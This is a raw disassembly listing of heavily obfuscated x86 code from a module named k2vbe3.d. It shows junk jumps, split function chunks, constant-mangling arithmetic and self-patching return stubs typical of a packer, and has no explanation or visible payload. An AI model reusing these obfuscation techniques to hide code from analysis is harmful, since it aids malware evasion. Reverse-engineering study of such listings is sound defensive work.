; START	OF FUNCTION CHUNK FOR sub_43D8BF

loc_44459A:				; CODE XREF: sub_43D8BF+7j
		jmp	sub_444FB1
; END OF FUNCTION CHUNK	FOR sub_43D8BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44459F:				; CODE XREF: sub_44C90E:loc_4411EAj
		jnz	loc_459FE1
		jmp	loc_444B39
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_4445AA:				; CODE XREF: sub_454E69-1489Fj
		jz	loc_4451A5
		jmp	loc_45B430
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_4445B5:				; CODE XREF: sub_44866A:loc_43F6FFj
		test	eax, ebx
		jmp	loc_4582D1
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E388

loc_4445BC:				; CODE XREF: sub_44E388+10j
		and	eax, 6A5FD058h
		cmp	eax, 82D55771h
		jmp	loc_450A59
; END OF FUNCTION CHUNK	FOR sub_44E388
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_420. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_4445CE:				; CODE XREF: sub_456C15-AF32j
		jmp	loc_4570F7
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_4445D3:				; CODE XREF: sub_44E90D-12586j
		call	sub_441E66

loc_4445D8:				; CODE XREF: sub_43DFE1+18436j
		jmp	nullsub_173
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_4445DD:				; CODE XREF: sub_458DAF-12456j
		jmp	loc_453312
; END OF FUNCTION CHUNK	FOR sub_458DAF

; =============== S U B	R O U T	I N E =======================================



sub_4445E2	proc near		; CODE XREF: k2vbe3.d:0043C93Dj
					; sub_4481FA-95ECp

var_8		= dword	ptr -8
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C22F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448332 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451C56 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045542E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459118 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045A180 SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		pop	edx
		jb	loc_451C56
		ror	eax, 13h
		xor	eax, 0D336177h
		mov	edx, [esp-8+arg_4]
		jmp	loc_43C22F
sub_4445E2	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_450. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4445FF:				; CODE XREF: k2vbe3.d:00458036j
		jmp	loc_45195B
; ---------------------------------------------------------------------------

loc_444604:				; DATA XREF: sub_44F4C7+1o
		xchg	edx, [esp]
		mov	ebp, edx
		pop	edx
		retn
; ---------------------------------------------------------------------------

loc_44460B:				; CODE XREF: k2vbe3.d:004554A1j
		jmp	nullsub_505
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_444610:				; CODE XREF: sub_452CF7-4353j
		jmp	nullsub_15
; END OF FUNCTION CHUNK	FOR sub_452CF7

; =============== S U B	R O U T	I N E =======================================



sub_444615	proc near		; CODE XREF: k2vbe3.d:0043CA4Aj
					; sub_43E88E+10p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00452DB8 SIZE 00000005 BYTES

		push	edi
		mov	edi, ebp
		xchg	edi, [esp+4+var_4]
		push	offset loc_4577C7
		jmp	loc_452DB8
sub_444615	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_444625:				; CODE XREF: sub_43D823+A41Bj
		sub	edi, ecx
		jo	loc_43F99F

loc_44462D:				; CODE XREF: sub_43D823:loc_43C8A9j
					; sub_441885-1459j ...
		jmp	loc_44743C
; ---------------------------------------------------------------------------

loc_444632:				; CODE XREF: sub_44469A-3ADAj
					; sub_43D823:loc_454600j
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------

loc_44463A:				; CODE XREF: k2vbe3.d:004565E4j
		jmp	locret_459BF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_44463F:				; CODE XREF: sub_442475+6580j
		jmp	loc_44C823
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_444. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_444646:				; CODE XREF: sub_43DFE1+15CC0j
		jmp	loc_44607F
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------

loc_44464B:				; CODE XREF: k2vbe3.d:0044F77Bj
		call	sub_43C04E
		test	al, al
		jz	loc_4522AE
		jmp	loc_458936
; ---------------------------------------------------------------------------
		mov	eax, 0FFB060E7h
		call	sub_4553CC
		mov	ds:dword_41E1B4, eax
		lea	eax, nullsub_522
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_522
; ---------------------------------------------------------------------------

loc_44467B:				; DATA XREF: k2vbe3.d:loc_44CD1Eo
		mov	eax, [ebp-0Ch]
		cmp	eax, ds:dword_44BD44
		jz	loc_44A78F
		jmp	loc_443371
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C927

loc_44468F:				; CODE XREF: sub_43C927+668Aj
		mov	ebp, eax
		xchg	ebp, [esp+8+var_8]
		retn
; END OF FUNCTION CHUNK	FOR sub_43C927
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_444695:				; CODE XREF: sub_44662B+6ECFj
		jmp	loc_441231
; END OF FUNCTION CHUNK	FOR sub_44662B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44469A	proc near		; CODE XREF: sub_44BA05+3p

var_18		= dword	ptr -18h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CAEC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043DBD9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E046 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E51E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FB49 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00440431 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440BA9 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044147F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441CA2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004431BD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004433F8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448750 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448F26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004490E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449149 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A23E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A350 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C58A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF8F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452F1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453C86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455366 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045576E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004560A7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00457BF4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458B13 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004594B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004598DD SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045C07E SIZE 0000000B BYTES

		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp+0]
		mov	ebp, esp
		jmp	loc_455366
sub_44469A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_4446A7:				; CODE XREF: sub_447664:loc_44BA98j
		mov	ebx, ecx
		pop	ecx
		and	ebx, 7FE3F80Bh
		xor	ebx, 0ECDD7E28h
		jmp	loc_44BD00
; END OF FUNCTION CHUNK	FOR sub_447664
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_437. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4446BC:				; CODE XREF: k2vbe3.d:004481B9j
		jmp	loc_43C1D7
; ---------------------------------------------------------------------------

loc_4446C1:				; CODE XREF: k2vbe3.d:00442772j
		jbe	loc_44690D
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_4446C7:				; CODE XREF: sub_44E00F:loc_44B02Dj
		add	esi, 84C44B18h
		popf
		xchg	esi, [esp-4+arg_0]
		jmp	loc_44D68A
; END OF FUNCTION CHUNK	FOR sub_44E00F
; ---------------------------------------------------------------------------
		mov	ds:off_41E014, eax
		push	offset sub_4580D1
		jmp	loc_45214D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_4446E6:				; CODE XREF: sub_43DEBE+E59Cj
					; sub_43DEBE:loc_45BC04j
		mov	eax, 0BB0E1C2h
		push	ebx
		push	0D86DCDAAh
		pop	ebx
		or	ebx, 0EE7BB7A2h
		and	ebx, 798BD44Ah
		sub	ebx, 5244F5ACh
		rol	ebx, 1
		jmp	loc_4505D1
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------

loc_44470B:				; CODE XREF: k2vbe3.d:004422F8j
		push	offset sub_44693E
		jmp	loc_4505CC
; ---------------------------------------------------------------------------

loc_444715:				; CODE XREF: k2vbe3.d:00456D96j
		or	ebx, 0D6399EEEh

; =============== S U B	R O U T	I N E =======================================



sub_44471B	proc near		; CODE XREF: sub_454463:loc_44E586p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C51E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FB04 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440712 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044134E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441621 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441AA5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443036 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443097 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443C55 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044491F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044624E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447B3E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A65E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044C875 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044D0A4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044D143 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045245D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00453802 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00456628 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456954 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457C28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458062 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BC93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BF1D SIZE 00000019 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		jmp	loc_44A65E
sub_44471B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ebx, esi
		jmp	loc_44B31A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_444739:				; CODE XREF: sub_440C94+E208j
		mov	esi, ecx
		pop	ecx
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jmp	loc_447D60
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_444746:				; CODE XREF: sub_4524D2+9666j
		add	eax, [esp+4+var_4]
		adc	edx, [esp+4]
		add	esp, 8
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_4402FA
		cmp	eax, [ebp-8]
		jmp	loc_454DBA
; END OF FUNCTION CHUNK	FOR sub_4524D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_444762:				; CODE XREF: sub_44FF97:loc_441F80j
					; sub_4534C2-D4BDj
		push	offset loc_4545EA
		jmp	loc_453684
; END OF FUNCTION CHUNK	FOR sub_4534C2
; ---------------------------------------------------------------------------

loc_44476C:				; CODE XREF: k2vbe3.d:loc_44539Bj
		mov	ebp, eax
		xchg	ebp, [esp]
		call	sub_44C1BD
		push	offset sub_451F2D
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44477B:				; CODE XREF: sub_43DFE1:loc_443FF1j
		jmp	nullsub_261
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		jb	loc_45506F
		mov	eax, [esp]
		push	edx
		call	sub_4479A1
		mov	eax, 22143682h
		jmp	loc_44B28D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440621

loc_44479F:				; CODE XREF: sub_440621+94j
					; sub_440621:loc_446BAFj
		pop	ecx
		push	offset loc_459380
		jmp	loc_44B2D2
; END OF FUNCTION CHUNK	FOR sub_440621
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_4447AA:				; CODE XREF: sub_44B979:loc_441758j
		test	ebx, 8A273989h
		jmp	loc_4483A1
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_4447B5:				; CODE XREF: sub_457DCA-1636Cj
		jge	loc_4435AE
		cdq
		jmp	loc_43F1CA
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_4447C1:				; CODE XREF: sub_443F0D:loc_4418A6j
					; sub_443F0D-265Ej
		add	edx, ds:4000EAh

loc_4447C7:				; CODE XREF: sub_456C15+4E8j
		xor	edx, 0E18133EAh
		xchg	edx, [esp+8+var_8]
		call	sub_43F73B

loc_4447D5:				; CODE XREF: sub_43C9E9+1F90Fj
		rol	esi, 9
		add	esi, 0D5B5D5DDh
		xchg	esi, [esp+8+var_8]
		jmp	loc_44933C
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_4447E6:				; CODE XREF: sub_45AD42-34BDj
		or	ecx, 0F3CBAB35h
; END OF FUNCTION CHUNK	FOR sub_45AD42

; =============== S U B	R O U T	I N E =======================================



sub_4447EC	proc near		; CODE XREF: sub_44CE6C+1FFCp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		xchg	edx, [esp+0]
		pop	edx
		add	eax, eax
		cdq
		add	eax, [esp-4+arg_0]
		adc	edx, [esp-4+arg_4]
		jmp	loc_4515A9
sub_4447EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4447FF:				; CODE XREF: sub_447E07+23A5j
		add	edx, 1BC2A28Dh
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_447F9C
		jmp	loc_449347
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_444816:				; CODE XREF: sub_444297:loc_4536BBj
		jnz	loc_44AED6
		jmp	loc_4585B8
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_444821:				; CODE XREF: sub_443FC1+959Cj
		mov	eax, 3195933h
		push	eax
		mov	eax, edx
		xchg	eax, [esp-4+arg_0]
		push	0B961DE6Bh
		jmp	loc_44D3D2
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

locret_444836:				; CODE XREF: k2vbe3.d:loc_43CA75j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_444837:				; CODE XREF: sub_43F2E0+15576j
		jmp	loc_447EED
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------

loc_44483C:				; CODE XREF: k2vbe3.d:loc_45411Fj
		test	esi, 0CBF9E54h
		jmp	loc_44E624
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_444847:				; CODE XREF: sub_43CCD0+1863Aj
		and	edx, 1EC45B34h
		sub	edx, 0DD1BE571h
		or	edx, 7A22BAB4h
		push	offset loc_44DB18
		jmp	nullsub_378
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_444863:				; CODE XREF: k2vbe3.d:004519B7j
		sub	ebp, edx

; =============== S U B	R O U T	I N E =======================================



sub_444865	proc near		; CODE XREF: sub_45C14C-B0DEp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044EC0E SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	eax, [esp-4+arg_0]
		jmp	loc_44EC0E
sub_444865	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_444871:				; CODE XREF: sub_4440E5-5504j
		shl	edi, 0Ch

loc_444874:				; CODE XREF: sub_4440E5:loc_454DEAj
		call	sub_45A309
		lea	eax, sub_44F570
		call	sub_44D9A7
; END OF FUNCTION CHUNK	FOR sub_4440E5
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_444884:				; CODE XREF: sub_44866A+893Fj
		jmp	loc_44C1D3
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_444889:				; CODE XREF: sub_45AD42-FD30j
		rol	ecx, 14h
		jnb	loc_44986C
; END OF FUNCTION CHUNK	FOR sub_45AD42
; START	OF FUNCTION CHUNK FOR sub_45024C

loc_444892:				; CODE XREF: sub_45024C+2D0Fj
		jmp	sub_454BCE
; END OF FUNCTION CHUNK	FOR sub_45024C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6B7

loc_444897:				; CODE XREF: sub_44D6B7+10j
		jmp	loc_4514AD
; END OF FUNCTION CHUNK	FOR sub_44D6B7
; ---------------------------------------------------------------------------
		sbb	ebp, 31CA1ACDh
		jb	loc_45879A
		adc	edi, 0AF003D49h
		jmp	loc_449860

; =============== S U B	R O U T	I N E =======================================



sub_4448B3	proc near		; CODE XREF: k2vbe3.d:0043CEA5p
					; k2vbe3.d:00457E86j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00452CD5 SIZE 00000012 BYTES

		xchg	edx, [esp+0]
		pop	edx
		rol	eax, 4
		push	edx
		push	3CC582C9h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_452CD5
sub_4448B3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4448C8:				; DATA XREF: sub_4432B0+16984o
		add	esi, 804633A3h
		call	sub_44C5E3
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_4448D3:				; CODE XREF: sub_44D59D+6469j
		rol	esi, 11h
		jmp	loc_45208B
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------

locret_4448DB:				; CODE XREF: k2vbe3.d:0045639Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4448DC:				; CODE XREF: sub_45A323-8202j
		jmp	loc_44A402
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_4448E1:				; CODE XREF: k2vbe3.d:00444EF5j
		jge	loc_449CFA
		xor	eax, ebp

; =============== S U B	R O U T	I N E =======================================



sub_4448E9	proc near		; CODE XREF: k2vbe3.d:00443DFEp

; FUNCTION CHUNK AT 00440FDE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044897F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044A0D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DC88 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00451371 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, ds:dword_445628
		push	edi
		push	63652B45h
		jmp	loc_44A0D2
sub_4448E9	endp

; ---------------------------------------------------------------------------

loc_4448FD:				; CODE XREF: k2vbe3.d:004413DBj
		xor	ebx, ebp
		add	ecx, edi
		jle	sub_44B335

loc_444907:				; CODE XREF: k2vbe3.d:loc_45B1F9j
		push	edi
		push	0A9498117h
		pop	edi
		sub	edi, 1011C998h
		add	edi, 670D1785h
		jmp	loc_45C1AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_44491F:				; CODE XREF: sub_44471B:loc_44D143j
		adc	eax, 276702D6h
		jmp	sub_442C7E
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------

loc_44492A:				; CODE XREF: k2vbe3.d:0045ADB1j
		mov	[esi], eax
; START	OF FUNCTION CHUNK FOR sub_45775D

loc_44492C:				; CODE XREF: sub_45775D:loc_45AD9Ej
		add	ecx, 2A4984C7h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_457048
; END OF FUNCTION CHUNK	FOR sub_45775D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_44493A:				; CODE XREF: sub_45A21D:loc_452055j
		call	sub_44F42B

loc_44493F:				; CODE XREF: sub_445321+14j
		jmp	loc_45B2E2
; END OF FUNCTION CHUNK	FOR sub_45A21D

; =============== S U B	R O U T	I N E =======================================



sub_444944	proc near		; DATA XREF: sub_4529E2:loc_43C15Eo

; FUNCTION CHUNK AT 0044F882 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458644 SIZE 00000014 BYTES

		push	ebx
		push	0E6E18C99h
		pop	ebx
		and	ebx, 0E6B3157Dh
		add	ebx, 19A338ECh
		call	sub_4402E3

loc_44495C:				; CODE XREF: sub_44B94B+8DBAj
		jmp	loc_44F882
sub_444944	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_444961:				; CODE XREF: sub_4467A1+10j
		jmp	loc_43F2F3
; END OF FUNCTION CHUNK	FOR sub_4467A1

; =============== S U B	R O U T	I N E =======================================



sub_444966	proc near		; CODE XREF: k2vbe3.d:0044038Bj
					; sub_450F71:loc_441E5Cp

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043EF6E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043FBC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044068B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440F45 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441BAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445EAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447189 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449337 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449BA9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044DCF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FD23 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004521E6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00454427 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045538B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004560E4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004566B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004590ED SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045B32F SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		cmp	dword ptr [ebp-4], 0
		jz	loc_440F45

loc_444974:				; CODE XREF: sub_44F028:loc_43D88Dj
		jmp	loc_44DCF0
sub_444966	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_394. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_44497A:				; CODE XREF: sub_459A60:loc_459A68j
		jmp	loc_454D4C
; END OF FUNCTION CHUNK	FOR sub_459A60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457960

loc_44497F:				; CODE XREF: sub_457960+1Cj
		jmp	loc_45A9CF
; END OF FUNCTION CHUNK	FOR sub_457960
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_444984:				; CODE XREF: sub_447692+49A8j
		jmp	loc_457769
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------

loc_444989:				; CODE XREF: k2vbe3.d:0043F138j
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_44498A	proc near		; CODE XREF: sub_45ADED-13F56p

; FUNCTION CHUNK AT 0043E273 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446037 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004467DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004469EF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BE67 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044CB37 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F08B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457071 SIZE 00000022 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	7E0B97C9h
		jmp	loc_4469EF
sub_44498A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444998:				; DATA XREF: sub_45451C-F72Fo
		ror	eax, 14h
		mov	dword ptr ds:loc_43C7B0, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_4449A2:				; CODE XREF: sub_43E8D4+8j
		jmp	loc_44E28B
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_4449A7:				; CODE XREF: sub_45451C-11958j
		rol	eax, 14h
		push	ebx
		jmp	loc_451A13
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------
		mov	ds:dword_41E05C, eax
		lea	eax, nullsub_406
		mov	byte ptr [eax],	0C3h
		jmp	loc_45599E
; ---------------------------------------------------------------------------

loc_4449C4:				; CODE XREF: k2vbe3.d:0044A916j
		mov	eax, [esp]
		push	edx
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		jmp	loc_43E146
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_4449D3:				; CODE XREF: sub_4490B2+181Fj
		xor	ecx, 0EFC8812Ch
		add	ecx, 0EF1BD6A5h
		xor	ecx, 0EAE8CFF6h
		and	ecx, 7C25D1FFh
		cmp	ecx, 0A86EDD73h
		jmp	loc_447752
; END OF FUNCTION CHUNK	FOR sub_4490B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_233. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459810

loc_4449F7:				; CODE XREF: sub_459810+Dj
		jmp	loc_44B736
; END OF FUNCTION CHUNK	FOR sub_459810
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448113

loc_4449FC:				; CODE XREF: sub_448113+DE09j
		jmp	loc_45A34A
; END OF FUNCTION CHUNK	FOR sub_448113
; ---------------------------------------------------------------------------

loc_444A01:				; CODE XREF: k2vbe3.d:004444C4j
		jmp	loc_45BDBB

; =============== S U B	R O U T	I N E =======================================



sub_444A06	proc near		; CODE XREF: sub_44B979:loc_45B264j
		push	ebx
		jmp	sub_456541
sub_444A06	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_340. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_444A0D:				; CODE XREF: k2vbe3.d:0044915Dj
		or	ebp, ecx
		test	edi, 0F9C4B529h
		jmp	loc_44EA96

; =============== S U B	R O U T	I N E =======================================



sub_444A1A	proc near		; CODE XREF: k2vbe3.d:00448F21p
					; k2vbe3.d:0045A473j
		xchg	esi, [esp+0]
		pop	esi
		lea	eax, nullsub_482
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_482
sub_444A1A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	offset sub_444BD5
		jmp	locret_45B2FB
